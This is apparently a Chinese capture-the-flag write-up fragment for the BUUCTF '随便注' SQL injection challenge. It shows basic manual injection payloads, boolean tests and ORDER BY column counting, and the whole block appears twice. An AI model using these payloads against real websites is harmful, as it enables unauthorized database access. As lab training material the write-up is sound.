BUUCTF web 随便注 sql注入 mysql预处理语句
开始的页面
查询1
按照手工检测sql注入点步骤
1、判断注入点
1' or 1=1#
1' or 1=2#
两次结果不一样,说明存在sql注入
2、判断有多少字段
1' order by 3#
返回错误
1' order by 2#
正常,说明有2个字段
BUUCTF web 随便注 sql注入 mysql预处理语句
开始的页面
查询1
按照手工检测sql注入点步骤
1、判断注入点
1' or 1=1#
1' or 1=2#
两次结果不一样,说明存在sql注入
2、判断有多少字段
1' order by 3#
返回错误
1' order by 2#
正常,说明有2个字段